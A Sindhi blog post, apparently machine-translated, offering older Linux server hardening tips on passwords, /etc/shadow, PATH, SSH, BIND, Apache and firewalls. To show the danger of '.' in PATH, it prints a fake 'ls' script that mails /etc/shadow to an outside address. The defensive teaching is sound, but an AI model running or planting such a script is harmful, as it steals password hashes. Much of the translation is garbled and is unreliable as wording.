مون بلاگ تي گهڻي وقت کان ڪجهه به شايع نه ڪيو آهي ۽ مان توهان سان شيئر ڪرڻ چاهيان ٿو ڪتاب کان ڪجهه صلاح ورتي جيڪا ، (ٻين جي وچ ۾). مون اهو ڳولي لڌو يونيورسٽي ۾ ۽ مان صرف پڙهي چڪو آهيان ۽ جيتوڻيڪ اهو ايمانداري طور تي ڪجهه پراڻو آهي ۽ ڏيکاريل ٽيڪنالاجي ڏا veryي ممڪن ناهي سسٽم جي ارتقائي سلسلي کي ڪم ڪرڻ جي ، اهي به دلچسپ پهلو آهن جن کي ڏيکاري سگهجي ٿو.
آئون واضح ڪرڻ چاهيان ٿو ته اهي لينڪس سسٽم تي صلاح مشورا ڪندڙ هوندا آهن جيڪي سرور جي طور تي استعمال ڪيا ويندا آهن ، وچولي يا شايد وڏي سطح تي ڊيسڪ ٽاپ صارف جي سطح کان وٺي ، جيتوڻيڪ اهي لاڳو ٿي سگهن ٿيون ، اهي گهڻو ڪارائتو نه هوندا.
مون اهو پڻ نوٽ ڪيو ته اهي آسان تڪڙا ڳوڙها آهن ۽ مان گهڻو تفصيل ۾ نه ويندس ، جيتوڻيڪ آئون هڪ خاص موضوع تي هڪ ٻي وڌيڪ وڏي ۽ وسيع پوسٽ ٺاهڻ جو ارادو ڪيان ٿو. پر آئون بعد ۾ به ڏسندس. اچو ته شروع ڪريون.
Index
پاسورڊ پاليسيون.
جيتوڻيڪ اهو هڪ ڪيفرفر وانگر لڳي ٿو ، هڪ سٺي پاسورڊ پاليسي هجڻ سان ڪمزور نظام ۾ فرق ٿئي ٿو يا نه. ڪنهن به نظام تائين رسائي لاءِ خراب پاسورڊ هجڻ جو فائدو وٺندي ”بروٽ فورس“ جهڙيون حرڪتون ڪنديون آهن. سڀ کان عام تجويزون آهن:
- گڏيل ۽ ننcaseن اکرن کي گڏ ڪريو.
- خاص اکر استعمال ڪريو.
- انگ اکر.
- 6 کان وڌيڪ انگ (اميد آهي ته وڌيڪ 8 آهن).
ان کان علاوه ، اچو ته ٻه ضروري فائلن تي غور ڪيون. / وغيره / پاسواڊ ۽ / وغيره / پاڇو.
ھڪڙي شيء تمام ضروري آھي اھو فائل / وغيره / پاسواڊ. اسان کي صارف جو نالو ڏيڻ لاءِ ، هن جو يوڊ ، فولڊر جو رستو ، بش وغيره وغيره. ڪجهه حالتن ۾ اهو صارف جي انڪوائري ٿيل خاص پڻ ڏيکاري ٿو.
اچو ته ان جي عام ترتيب تي ڏسو.
desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash
استعمال ڪندڙ: cryptkey: uid: gid: path :: path: bash
اصل مسئلو هتي ، اهو آهي خاص فائل کي اجازتون آهن آر آر-آر جنهن جو مطلب آهي ته اهو ڪنهن سسٽم جي صارف لاءِ اجازتون پڙهي چڪو آهي. ۽ ان کي ختم ڪرڻ لاءِ ڪن کي اصل قرار ڏيڻ تمام ڏکيو نه آهي.
ان ڪري اھو فائل موجود آھي / وغيره / پاڇو. هي فائيل آهي جتي ٻين صارفن جي گڏجاڻين جون ڪنجيون محفوظ ٿيل آهن. ھن فائل ۾ ضروري اجازتون آھن ته جيئن ڪو به صارف ان کي پڙھي نه سگھي.
انهي کي ٺيڪ ڪرڻ لاءِ ، اسان کي فائل ڏانهن وڃڻ گهرجي / وغيره / passwd ۽ ”ايڪس“ واري ڳجهو ڪوڊ کي تبديل ڪيو ، اهو ئي سبب بڻائيندو ، جيڪو صرف اسان جي فائل ۾ محفوظ ٿيل هوندو / وغيره / پاڇو.
desdelinux:x:500:501::/home/usuario1:/bin/bash
PATH ۽ .bashrc ۽ ٻين سان گڏ مسئلا.
جڏهن هڪ صارف انهن جي ڪنسول تي هڪ حڪم جاري ڪري ٿو ، شيل انهي PATH ماحول واري ڪيفيت ۾ شامل ڊائريڪٽريز جي لسٽ ۾ نظر اچي ٿو.
جيڪڏهن توهان ڪنسول ۾ ”گونج $ پيٿ“ لکو ٿا ته اهو ڪجهه هن طرح پيدا ڪندو.
.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin
انهن فولڊرن مان هر هڪ اهو آهي جتي شيل ان کي عمل ڪرڻ لاءِ لکيل حڪم ڳولي ٿو. هن "." ان جو مطلب آهي ته ڳولا ڪرڻ لاءِ پهريون فولڊر اهو ساڳيو فولڊر آهي جتي کان حڪم ڪمايو ويندو آهي.
فرض ڪريو ته هتي هڪ صارف ”ڪارلوس“ آهي ۽ اهو صارف ”برا ڪم“ ڪرڻ چاهي ٿو. اهو صارف پنهنجي مين فولڊر ۾ فائل "ls" ڇڏي سگهي ٿو ، ۽ انهي فائل ۾ هڪ حڪم جهڙو ڪم ڪيو:
#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls
۽ جيڪڏهن منزل جي شين لاءِ روٽ صارف ، ڪارلوس فولڊر جي اندر فولڊر کي لسٽ ڪرڻ جي ڪوشش ڪري ٿو (جئين اهو پهرين فولڊر ۾ ڪمانڊ جي تلاش ڪري ٿو ، ناجائز طور تي اها فائل انهي اي ميل ۽ پوءِ فولڊر جا پاسورڊ سان موڪلي رهيو آهي). فهرست ڏنل آهي ۽ هو تمام دير سان ڳولي نه سگهندو هو.
ان کان بچڻ لاءِ اسان کي ”ختم ڪرڻ“ لازمي آهي. PATH متغير جي.
ساڳئي طريقي سان ، فائلن جهڙوڪ /.bashrc ، /.bashrc_profile ، ./.login کي آڊٽ ڪيو وڃي ۽ جاچ پڙتال ڪريو ته ناهي ”. PATH متغير ۾ ، ۽ حقيقت ۾ هڪ فائلن کان ، توهان هڪ خاص حڪم جي منزل تبديل ڪري سگهو ٿا.
خدمتن سان صلاحون:
ايڇ ايڇ
- sshd_config فائل ۾ ايس ايس پروٽوڪول جو نسخو 1 غير فعال ڪريو.
- روش صارف کي ايسش ذريعي لاگ ان ٿيڻ جي اجازت نه ڏيو.
- فائلون ۽ فولڊر ssh_host_key ، ssh_host_dsa_key ۽ ssh_host_rsa_key صرف روٽ استعمال ڪندڙ کان پڙھڻ گھرجي.
BIND
- نالي واري فائل ۾ ڀليڪار پيغام مٽايو ته جيئن اهو ورزن نمبر ظاهر نه ڪري
- حد جي منتقلي کي محدود ڪريو ، ۽ صرف انهي ٽيمن لاءِ چالو ڪيو جيڪي انهي جي ضرورت هونديون آهن.
Apache
- استقبال واري پيغام ۾ خدمت کي پنهنجو نسخو ظاهر ڪرڻ کان روڪيو. httpd.conf فائل کي تبديل ڪريو ۽ لائين شامل ڪريو يا تبديل ڪريو.
ServerSignature Off
ServerTokens Prod
- خودڪار انڊيڪسنگ کي غير فعال ڪريو
- ترتيب ڏيو حساس فائلن وانگر .htacces ، * .inc ، * .jsp .. وغيره جي خدمت نه ڪرڻ
- سروس پيج تان انسان جا صفحا يا نمونو ڪيو
- ڪاوڙيل ماحول ۾ ايشيش هليو
نيٽورڪ سيڪيورٽي.
توهان جي سسٽم ۾ خارجي نيٽ ورڪ کان هر ممڪن داخل ڪرڻ ضروري آهي ، هتي توهان جي نيٽ ورڪ کان معلومات حاصل ڪرڻ ۽ مداخلت ڪندڙن کي ڌانڌلي ڪرڻ کان بچائڻ لاءِ ڪجهه ضروري صلاحون آهن.
ICMP ٽرئفڪ کي بلاڪ ڪريو
فائر بورڊ کي اندر اچڻ ۽ ٻاهر نڪرندڙ هر قسم جي ICMP ٽريفڪ ۽ گونج جي جوابن کي بلاڪ ڪرڻ لاءِ ترتيب ڏيڻ گهرجي. ان سان توهان ان کان پاسو ڪريو ٿا ، مثال طور ، هڪ اسڪينر جيڪو توهان جي جڳهن جي اي پي جي علائقي ۾ رهندڙ سامان ڳولي رهيو آهي توهان کي ڳولي ٿو.
ٽي سي پي پنگ اسڪين ڪرڻ کان پاسو ڪريو.
توھان جي سسٽم کي اسڪين ڪرڻ جو ھڪڙو طريقو TCP ping اسڪين آھي. فرض ڪيو ته توهان جي سرور تي بندرگاهه 80 تي اپوڪي سرور آهي. مداخلت ڪندڙ هڪ بندرگاهه اي ڪي جي درخواست موڪلي سگهي ها ان سان ، جيڪڏهن نظام جواب ڏيندو ، ڪمپيوٽر زنده هوندو ۽ باقي بندرگاهن کي اسڪين ڪندو.
انهي لاءِ ، توهان جي فائر وال کي هميشه “اسٽيٽ آگاهي” جو اختيار هئڻ گهرجي ۽ سڀني اي سي جي پيڪٽس کي رد ڪرڻ گهرجي جيڪي اڳ ۾ ئي قائم ٿيل ٽي سي پي ڪنيڪشن يا سيشن سان تعلق نه رکن.
ڪجهه اضافي تجويزون:
- توهان جي نيٽ ورڪ ڏانهن پورٽ سکين جي سڃاڻپ ڪرڻ لاءِ آئي ڊي ايس سسٽم استعمال ڪريو.
- فائر وال ترتيب ڏيو ته جيئن اهو ڪنيڪشن ماخذ پورٽ سيٽنگن تي ڀروسو نه ڪري.
اهو ئي سبب آهي ڇاڪاڻ ته ڪجهه اسڪينس ”جعلي“ سورس پورٽ استعمال ڪن ٿيون جهڙوڪ 20 يا 53 ، ڇاڪاڻ ته ڪيترائي نظام انهن بندرگاهن تي ڀروسو ڪن ٿا ڇاڪاڻ ته اهي عام طور تي هڪ فوٽ يا ڊي اين ايس جو عام آهن.
نوٽس ياد رهي ته هن پوسٽ ۾ ظاهر ٿيل تمام گھڻا مسئلا اڳ ئي تقريبن سڀني تقسيم ۾ حل ٿي چڪا آهن. پر ان مسئلن بابت اهم معلومات هجڻ ۾ ڪا به تڪڙ نه هوندي آهي ته جيئن اهي توهان سان نه ٿين.
نوٽس بعد ۾ آئون هڪ خاص موضوع ڏسندس ۽ وڌيڪ پوسٽ ۽ وڌيڪ موجوده معلومات سان گڏ پوسٽ ڪندس.
سڀني کي پڙهڻ لاءِ ٿورائتو آهي.
مهرباني
هڪ رايو ، توهان ڇڏيو
مون واقعي مضمون کي پسند ڪيو ۽ مان مضمون ۾ دلچسپي رکندو آهيان ، آئون توسان مواد وڌائڻ جي حوصلا افزائي ڪيان ٿو.